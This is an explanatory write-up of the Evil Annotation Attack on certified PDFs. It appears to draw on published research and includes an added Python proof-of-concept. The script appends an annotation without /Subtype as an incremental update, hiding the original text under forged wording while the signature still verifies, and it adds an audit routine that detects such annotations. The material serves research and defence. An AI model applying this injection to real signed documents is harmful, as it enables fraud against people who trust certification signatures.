
The idea of the Evil Annotation Attack (EAA) is to display arbitrary content in a certified document by abusing annotations. Since certified documents with permission level P3 allow annotations to be added, EAA breaks the integrity of the certification while the certification signature remains valid.

We identified three annotation types with danger level high that can both hide and add text and images: FreeText, Redact, and Stamp. All three can be used to stealthily modify a certified document and inject malicious content.

In addition, 11 of the 28 annotation types are classified as medium, since an attacker can use them to hide content within the certified document.

The remaining annotation types are classified as low or none, since they are either quite limited in what they can display or not allowed in certified documents at all.

Attacking with Annotations: EAA

According to our attacker model, the attacker possesses a validly certified document that permits the insertion of annotations (permission level P3). To execute the attack, the attacker modifies the certified document by adding an annotation with the malicious content at a position of the attacker's choice. The attacker then sends the modified file to the victim, who verifies the digital signature. Since adding annotations is a permitted modification, the verification succeeds and the viewer reports the document as validly certified.

The victim could detect the attack by manually opening one of the side bars (for example, the comment panel) or by clicking on the annotation. However, none of the tested PDF applications opened the side bars automatically. Additionally, the attacker can lock the annotation, which disables clicking on it.

Improving the stealthiness of EAA

To make the attack stealthier, we developed techniques that prevent the annotation from being visualized, so that it does not appear in any side bar. Surprisingly, we found a generic and simple bypass that applies to all annotation types. PDF viewers identify an annotation by its /Subtype entry. The viewer also uses /Subtype to assign the matching editing tool, such as a text editor for FreeText comments. If /Subtype is missing or set to a value the specification does not define (neither case is prohibited by the specification), the viewer cannot assign the annotation to any tool or side-bar category. The annotation's appearance stream (/AP) is nevertheless rendered on the page, so the injected content stays visible while the annotation itself is indistinguishable from the original content.
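The following script is an added example, not code from the original page or from the authors of the attack. It demonstrates both steps described above: the attack procedure (appending an annotation to an already signed file as an incremental update, so that every original byte, and hence a signature's /ByteRange, is left untouched) and the /Subtype bypass (emitting the annotation without a /Subtype entry while still giving it an appearance stream that the viewer draws). It also includes a small audit routine a verifier could run to flag annotations whose /Subtype is missing. The input PDF is a constructed one-page stand-in for a certified document (no real certification signature is produced), and the parsing is regex-based, assuming simple, unencrypted objects and a single page; the names `minimal_pdf`, `inject_annotation` and `audit_annotations` are this example's own.

```python
"""Added example: Evil Annotation Attack as an incremental update, plus an audit.
Not code from the original page. Constructed sample PDF; regex parsing assumes
simple, unencrypted, single-page files."""
from __future__ import annotations
import re

OBJ_RE = re.compile(rb"(\d+) 0 obj\s*(.*?)\s*endobj", re.S)


def pdf_string(s: bytes) -> bytes:
    """Escape a byte string for use inside a PDF literal string ( ... )."""
    return s.replace(b"\\", b"\\\\").replace(b"(", b"\\(").replace(b")", b"\\)")


def minimal_pdf() -> bytes:
    """Constructed sample: one page with a single text line (stands in for the certified file)."""
    text = b"BT /F1 24 Tf 72 700 Td (Original certified text) Tj ET"
    bodies = [
        b"<< /Type /Catalog /Pages 2 0 R >>",
        b"<< /Type /Pages /Kids [3 0 R] /Count 1 >>",
        b"<< /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] "
        b"/Resources << /Font << /F1 5 0 R >> >> /Contents 4 0 R >>",
        b"<< /Length %d >>\nstream\n%s\nendstream" % (len(text), text),
        b"<< /Type /Font /Subtype /Type1 /BaseFont /Helvetica >>",
    ]
    out, offsets = bytearray(b"%PDF-1.7\n"), []
    for num, body in enumerate(bodies, start=1):
        offsets.append(len(out))
        out += b"%d 0 obj\n%s\nendobj\n" % (num, body)
    xref = len(out)
    out += b"xref\n0 %d\n0000000000 65535 f \n" % (len(bodies) + 1)
    out += b"".join(b"%010d 00000 n \n" % o for o in offsets)
    out += b"trailer\n<< /Size %d /Root 1 0 R >>\nstartxref\n%d\n%%%%EOF\n" % (len(bodies) + 1, xref)
    return bytes(out)


def objects(pdf: bytes) -> dict[int, bytes]:
    """Object number -> body. A later definition (incremental update) overrides an earlier one."""
    return {int(m.group(1)): m.group(2) for m in OBJ_RE.finditer(pdf)}


def find_page(pdf: bytes) -> tuple[int, bytes]:
    for num, body in objects(pdf).items():
        if re.search(rb"/Type\s*/Page\b", body):
            return num, body
    raise ValueError("no page object found")


def inject_annotation(pdf: bytes, text: bytes, rect: tuple[int, int, int, int],
                      subtype: bytes | None = b"/FreeText") -> bytes:
    """Append an incremental update that adds one annotation with its own appearance
    stream. subtype=None omits /Subtype entirely (the generic side-bar bypass)."""
    size = int(re.findall(rb"/Size\s+(\d+)", pdf)[-1])          # next free object number
    root = re.findall(rb"/Root\s+(\d+ 0 R)", pdf)[-1]
    prev_xref = int(re.findall(rb"startxref\s+(\d+)", pdf)[-1])  # becomes /Prev of the new trailer
    page_num, page_body = find_page(pdf)
    annot_num, ap_num, font_num = size, size + 1, size + 2
    x1, y1, x2, y2 = rect
    w, h = x2 - x1, y2 - y1

    # The appearance stream is what the viewer draws, whether or not it recognises /Subtype:
    # a white box (hides whatever is underneath) with the attacker's text on top.
    draw = b"1 g 0 0 %d %d re f 0 g BT /F1 18 Tf 4 8 Td (%s) Tj ET" % (w, h, pdf_string(text))
    ap = (b"<< /Type /XObject /Subtype /Form /BBox [0 0 %d %d] "
          b"/Resources << /Font << /F1 %d 0 R >> >> /Length %d >>\nstream\n%s\nendstream"
          % (w, h, font_num, len(draw), draw))
    annot = b"<< /Type /Annot " + (b"/Subtype %s " % subtype if subtype else b"")
    annot += (b"/Rect [%d %d %d %d] /F 4 /AP << /N %d 0 R >> /Contents (%s) >>"
              % (x1, y1, x2, y2, ap_num, pdf_string(text)))
    font = b"<< /Type /Font /Subtype /Type1 /BaseFont /Helvetica >>"

    # Re-emit the page object (same object number) with the new reference appended to /Annots.
    m = re.search(rb"/Annots\s*\[([^\]]*)\]", page_body)
    existing = m.group(1).strip() + b" " if m else b""
    stripped = re.sub(rb"/Annots\s*\[[^\]]*\]", b"", page_body).rstrip()
    new_page = stripped[:-2].rstrip() + b" /Annots [%s%d 0 R] >>" % (existing, annot_num)

    # Incremental update: the original bytes are only ever appended to, never rewritten.
    out = bytearray(pdf if pdf.endswith(b"\n") else pdf + b"\n")
    offsets: dict[int, int] = {}
    for num, body in ((page_num, new_page), (annot_num, annot), (ap_num, ap), (font_num, font)):
        offsets[num] = len(out)
        out += b"%d 0 obj\n%s\nendobj\n" % (num, body)
    xref = len(out)
    out += b"xref\n%d 1\n%010d 00000 n \n%d 3\n" % (page_num, offsets[page_num], annot_num)
    out += b"".join(b"%010d 00000 n \n" % offsets[n] for n in (annot_num, ap_num, font_num))
    out += (b"trailer\n<< /Size %d /Root %s /Prev %d >>\nstartxref\n%d\n%%%%EOF\n"
            % (font_num + 1, root, prev_xref, xref))
    return bytes(out)


def audit_annotations(pdf: bytes) -> list[tuple[int, bytes | None]]:
    """Emulate a viewer: (object number, /Subtype) for each annotation the current page
    references. None means no tool or side-bar entry can be assigned although the /AP
    stream is still drawn; a verifier should flag these and any unknown values."""
    objs = objects(pdf)
    _, page_body = find_page(pdf)
    m = re.search(rb"/Annots\s*\[([^\]]*)\]", page_body)
    result = []
    for ref in (re.findall(rb"(\d+) 0 R", m.group(1)) if m else []):
        st = re.search(rb"/Subtype\s*(/\w+)", objs[int(ref)])
        result.append((int(ref), st.group(1) if st else None))
    return result


if __name__ == "__main__":
    original = minimal_pdf()
    evil = inject_annotation(original, b"Transfer 1,000,000 EUR", (72, 690, 420, 725), subtype=None)
    assert evil.startswith(original)   # signed bytes untouched: a /ByteRange signature still verifies
    print(audit_annotations(evil))     # the injected annotation shows up with no /Subtype
    with open("eaa-demo.pdf", "wb") as f:
        f.write(evil)
```

Opening `eaa-demo.pdf` in a viewer shows the injected box over the original text line, and because the new annotation has no /Subtype it is not listed in a comment side bar, which is exactly the condition `audit_annotations` reports as `None`. A defensive verifier can apply the same check to every object reachable from the page's /Annots array after the certification signature's /ByteRange and reject or warn on missing or non-standard /Subtype values.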